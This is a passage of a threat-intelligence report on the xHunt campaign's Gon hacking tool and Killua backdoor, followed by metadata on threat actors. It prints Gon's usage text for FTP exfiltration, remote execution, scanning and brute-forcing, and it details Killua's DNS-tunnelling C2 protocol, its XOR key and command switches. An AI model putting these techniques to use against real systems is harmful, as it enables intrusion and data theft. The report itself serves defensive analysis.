Users_DS.txt\r\nDS.exe group -limit 0 \u003e Group_DS.txt\r\nWhen using the command-line, an actor can easily see what functionality exists with Gon as the \"-help\" command provides\r\na usage output that resembles the following:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n___v0.2_              \r\n               /  _____/  ____   ____  \r\n              /   \\  ___ /  _ \\ /    \\\r\n              \\    \\_\\  (  \u003c_\u003e )   |  \\\r\n               \\______  /\\____/|___|  /\r\n                      \\/            \\/  \r\n-Up[-l Path.txt] FOLDER_OR_FILE -C Host;User;Pass [-KWF](kill when Finish) [-DEL](delete when item\r\nupload)\r\n[+] is ftp upload 1_ex=-up my_folder_or_File -KWF -DEL -C server.com;admin;123\r\n2_ex=-up-l my_Path.txt -C server.com;admin;123\r\n-Screen[-up][-s count,seconds] -C Host;User;Pass\r\n[+] Print Screen -up is upload to ftp and delete the file. -s will repate and will upload -C Cerdential For Upload via\r\nFTP\r\n-Remote [-P] [Host;user;pass;Wdir] [Code]\r\n[+] wmic to host;user;-P is psexecmode ,pass and save it in Wdir\\Thumb.dll\r\n-Download[-s] URL\r\n[+] http://www.URL , is -s Https will download in same directory\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 16 of 22\n\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n-Scan[-v IP-To][-l Path.txt] [setp] [-A]\r\n[+] Result will be in P.txt,-A is advanced scan but slower, step is number to bruteforce MAX 230 -\u003e ex = -Scan-v\r\n192.168.?.? 8\r\n-Bruter Path.txt username;pass{?} [+][-]\r\n[+] Result will be in N.txt , [+] Write netuse IP,[-] Write nont-netuse IP, Tip = Username \u0026 Password can be read\r\nfrom file\r\n-Rev[-clean][-loop] [V_ip] [port_to_Exit] [server;port]\r\n[+] RDP Revers on loop on every 10 min and with SYSTEM\r\n-Globe[-v p,o-r,t,s] [server]\r\n[+] Scan Global Port 123,443,80,81,23,21,22,20,110,25, v is Custom port\r\n-Done\r\n[+] self Distruct\r\nFigure 13. Command-line output for Gon functionality\r\nTo use the GUI, Gon requires the user to enter the password \"92\" in order to use the utility. After entering the correct\r\npassword, the user is presented with a UI that has an edited image of the Gon and Killua characters from the Hunter x\r\nHunter anime, as seen in Figure 14. \r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 17 of 22\n\nFigure 14. Gon’s Graphical User Interface showing a modified image of the Hunter x Hunter characters Gon and Killua\r\nThe GUI contains the same functionality as the command-line option, but also contains a button to enable \"Personal Use\".\r\nThis option disables a timer that will hide the Gon GUI window if the user does not have their cursor within the GUI for 80\r\nseconds (800ms timer interval, checked 100 times). \r\nWhen using the scanning functionality, Gon will write results to \u003cworking directory\u003e\\wnix\\Scan_Result.txt with contents\r\nsuch as:\r\n172.16.107[.]140[WIN-\u003credacted\u003e] --\u003e SMB\r\n**************Sakabota_v0.2.0.0*****2019-06-14|#|13:32************** \r\nThere are significant code overlaps between Gon and Sakabota/Hisoka as well, which suggests the same developer is\r\ninvolved in its development. \r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 18 of 22\n\nKillua \r\nWe observed yet another tool installed at the second Kuwait organization that we believe was created by the author of\r\nHisoka. This tool is referred to as Killua by the author, which is the name of another character in the Hunter x Hunter anime.\r\nKillua functions as a backdoor similar to Hisoka, but unlike its Hisoka cousin, Killua was not developed in C# -- rather it\r\nwas coded in Visual C++. Killua also appears to be newer than known Hisoka samples as Killua samples were not compiled\r\nuntil June 25 and 30, 2019. Similar to Hisoka, Killua writes its configuration to the registry using the following registry\r\nkeys:\r\nHKCU\\Control Panel\\International\\_ID: \u003cunique identifier\u003e\r\nHKCU\\Control Panel\\International\\_EndPoint: \"learn-service[.]com\"\r\nHKCU\\Control Panel\\International\\_Resolver_Server: \" \"\r\nHKCU\\Control Panel\\International\\_Response: \"180\"\r\nHKCU\\Control Panel\\International\\_Step: \"3\"\r\nKillua uses DNS tunneling to communicate with its C2 server and can only use DNS queries for tunneling using the built-in\r\n\"nslookup\" tool, which is the same method of sending DNS queries as Hisoka. Killua begins this communication by issuing\r\nan initial beacon query using a unique identifier for the compromised system as the subdomain. During our analysis, we\r\nobserved the unique identifier \"EVcmmi\", which base64 decodes to “Result goes here”. This action results in a beacon that\r\nqueried the following domain:\r\nEVcmmi.learn-service[.]com\r\nDuring our analysis, the DNS server responded back with \"66.92.110[.]4\". In this response, the first three octets signal\r\nKillua to begin sending additional queries in order to receive commands from the C2 DNS server. It will send these\r\ncommands within IPv4 answers to the queries. The fourth octet is used to determine how many DNS queries it needs to\r\nissue in order to receive the entirety of the data from the C2 server. In the case of \"66.92.110[.]4\", this instructed Killua to\r\nissue four queries to receive four IPv4 addresses within the answers provided by the C2 DNS server.\r\nThe four DNS queries issued by the DNS server started with the unique identifier \"EVcmmi\" and is then followed by base64\r\nencoded data as follows:\r\nEVcmmiYg==.learn-service[.]com\r\nEVcmmiYA==.learn-service[.]com\r\nEVcmmiYQ==.learn-service[.]com\r\nEVcmmiZw==.learn-service[.]com\r\nAt first, we believed that the subdomains containing the equals “=” characters would not resolve. However, we learned that\r\nDNS servers will respond to queries for domains that have labels containing non-standard characters. Before base64\r\nencoding the data, Killua encrypted the cleartext by XOR'ing each character with 83 (0x53), resulting in the following:\r\n\"Yg==\" is 1\r\n\"YA==\" is 3\r\n\"YQ==\" is 2\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 19 of 22\n\n\"Zw==\" is 4\r\nThe decrypted numbers above are the sequence numbers used to get the chunks of data requested by the C2 server. During\r\nour analysis, the C2 server responded to these queries with the following IPv4 addresses:\r\n69.67.1[.]81\r\n73.43.3[.]79\r\n55.80.2[.]68\r\n103.61.4[.]61\r\nAs you can see, the third octet contains the sequence number, while the other octets contain the data that Killua will put in\r\nthe correct sequence and treat as data. If we put the IP addresses in the correct sequence according to the third octet and treat\r\nthe other three octets as characters, we get the following:\r\n69.67.1[.]81 is \"ECQ\"\r\n55.80.2[.]68 is \"7PD\"\r\n73.43.3[.]79 is \"I+O\"\r\n103.61.4[.]61 is \"g==\"\r\nBy decoding the base64 string and decrypting it by XOR'ing each byte with 0x53, we can see the C2 server is issuing a\r\ncommand \"C\" followed by data \"whoami\":\r\n\u003e\u003e\u003e out = \"\"\r\n\u003e\u003e\u003e for c in base64.b64decode(\"ECQ7PDI+Og==\"):\r\n...  out += chr(ord(c)^0x53)\r\n... \r\n\u003e\u003e\u003e out\r\n'Cwhoami'\r\nThe command \"C\" is the same character used by Hisoka when attempting to receive commands to execute on the system. If\r\nthe character immediately following the \"C\" is not a hyphen (\"-\"), then Killua will execute the data as a command by calling\r\nCreateProcessW using \"cmd /c\" with the data appended to this string. Otherwise, Killua will check for provided commands\r\nthat visually resemble the following command line switches:\r\n-R\r\n-doer\r\n-S\r\n-status\r\n-change\r\n-id\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 20 of 22\n\n-resolver\r\n-help\r\nThe \"-help\" switch provides the following usage instructions which provide insight into the switches available and their\r\npurpose:\r\n+-+-+-+Killua-+-+-+-+\r\n-change [HOST.com]  ****** Change endPoint\r\n-doer ;[command] ****** Executer\r\n-status  ****** info\r\n-resolver [8.8.8.8]  ****** Resolver\r\n-R[num]s  ****** Response\r\n-P[num]  ****** packect\r\n-id [SIXLTR]  ****** ID\r\nTable View of the Link Analysis Chart\r\nDate Observed Domain IP Address Campaign ID\r\n2/15/17 ns1.cloudservername[.]com 82.102.14[.]226 DNS Hijacking\r\n6/1/17 microsoft-publisher[.]com 82.102.14[.]222 ISM Agent\r\n11/29/17 ns1.ressume[.]site 82.102.14[.]222 Oilrig\r\n12/29/17 ns2.pasta58[.]com 82.102.14[.]227 Sakabota\r\n1/14/18 dns.cloudipnameserver[.]com 185.15.247[.]140 DNS Hijacking\r\n9/9/18 sakabota[.]com 185.15.247[.]140 Sakabota\r\n9/18/18 ns1.firewallsupports[.]com 213.202.217[.]4 Sakabota\r\n11/18/18 googie[.]email 213.202.217[.]9 Oilrig\r\n5/11/18 whatzapps[.]net 217.79.176[.]97 Oilrig\r\n9/8/18 ns1.windows-updates[.]com 217.79.176[.]104 Sakabota\r\n9/18/18 ns1.6google[.]com 217.79.176[.]104 Sakabota\r\n2/19/19 ns1.windows64x[.]com 217.79.183[.]50 Sakabota\r\n3/5/19 ns1.microsofte-update[.]com 217.79.183[.]53 Hisoka\r\n3/20/19 ns1.windows64x.com 217.79.183[.]58 Sakabota\r\n1/9/18 www.opendns-server[.]com 217.79.185[.]85 Oilrig\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 21 of 22\n\n1/11/18 ns1.windows-updates[.]com 217.79.185[.]90 Sakabota\r\n2/19/18 dns.msnconnection[.]com 217.79.185[.]65 Oilrig\r\n10/13/18 ns1.6google[.]com 217.79.185[.]75 Sakabota\r\n1/9/18 outl00k[.]net 74.91.19[.]118 MuddyWater\r\n10/31/18 ns1.pasta58[.]com 74.91.19[.]113 Sakabota\r\n11/9/18 pasta58[.]com 74.91.19[.]113 Sakabota\r\n12/27/18 www.microsofte-update[.]com 74.91.19[.]119 Hisoka\r\n4/7/19 ns1.microsofte-update[.]com 91.132.139[.]183 Hisoka\r\n5/6/19 ns1.alforatsystem[.]com 91.132.139[.]254 Sakabota\r\nTable 3. Infrastructure Analysis for Sakabota and Hisoka domains\r\nSource: https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/" ], "report_names": [ "xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "20bc5b83-9ea0-4e60-a23e-19bf203dc9fb", "created_at": "2022-10-25T16:07:24.432777Z", "updated_at": "2026-04-10T02:00:04.986077Z", "deleted_at": null, "main_name": "xHunt", "aliases": [ "Cobalt Katana", "Hive0081", "Hunter Serpens", "SectorD01" ], "source_name": "ETDA:xHunt", "tools": [ "CASHY200", "COLDTRAIN", "Gon", "Hisoka", "Killua", "Netero", "SHELLSTING", "Sakabota", "Snugy", "TriFive" ], "source_id": "ETDA", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "c5a103eb-08af-410b-b11d-3635f4d4a3eb", "created_at": "2025-08-07T02:03:24.756187Z", "updated_at": "2026-04-10T02:00:03.667108Z", "deleted_at": null, "main_name": "COBALT KATANA", "aliases": [ "Hive0081 ", "SectorD01 ", "xHunt campaign " ], "source_name": "Secureworks:COBALT KATANA", "tools": [ "CASHY200", "Diezen", "Eye", "Gon", "Hisoka", "Hisoka Netero", "HyphenShell", "Killua", "Sakabota", "Sakabota Framework" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434177, "ts_updated_at": 1775792257, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8760851e40ff9b001aaa6128c13b4b1a7b5e52ba.pdf", "text": "https://archive.orkl.eu/8760851e40ff9b001aaa6128c13b4b1a7b5e52ba.txt", "img": "https://archive.orkl.eu/8760851e40ff9b001aaa6128c13b4b1a7b5e52ba.jpg" } }